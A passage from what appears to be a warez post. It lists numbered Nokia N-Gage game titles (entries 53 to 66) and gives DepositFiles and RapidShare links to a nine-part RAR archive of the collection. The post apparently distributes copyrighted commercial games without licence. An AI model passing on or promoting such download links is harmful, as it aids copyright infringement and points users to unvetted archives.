53)The Elder Scrolls Travels Shadowkey
54)The Roots Gates of Chaos
55)The Sims Bustin Out
56)Tiger Woods
57)Tomb Rider
58)Tony Hawks Pro Skater
59)Virtua Cop
60)Virtua Tennis
61)Warhammer 40,000 Glory in Death
62)Worms World Party
63)WWE Aftershock
64)Xanadu.Next
65)X-Men II - rise of the Apocalypse
66)X-Men Legends

Download:

[DepositFiles]

http://depositfiles.com/files/534580/Ngage.part01.rar
http://depositfiles.com/files/534588/Ngage.part02.rar
http://depositfiles.com/files/534583/Ngage.part03.rar
http://depositfiles.com/files/534591/Ngage.part04.rar
http://depositfiles.com/files/534582/Ngage.part05.rar
http://depositfiles.com/files/534587/Ngage.part06.rar
http://depositfiles.com/files/534589/Ngage.part07.rar
http://depositfiles.com/files/534592/Ngage.part08.rar

[RapidShare]

http://rapidshare.com/files/12069893/Ngage.part01.rar
http://rapidshare.com/files/12071578/Ngage.part02.rar
http://rapidshare.com/files/12071264/Ngage.part03.rar
http://rapidshare.com/files/12071062/Ngage.part04.rar
http://rapidshare.com/files/12070876/Ngage.part05.rar
http://rapidshare.com/files/12070674/Ngage.part06.rar
http://rapidshare.com/files/12070446/Ngage.part07.rar
http://rapidshare.com/files/12070191/Ngage.part08.rar
http://rapidshare.com/files/12070006/Ngage.part09.rar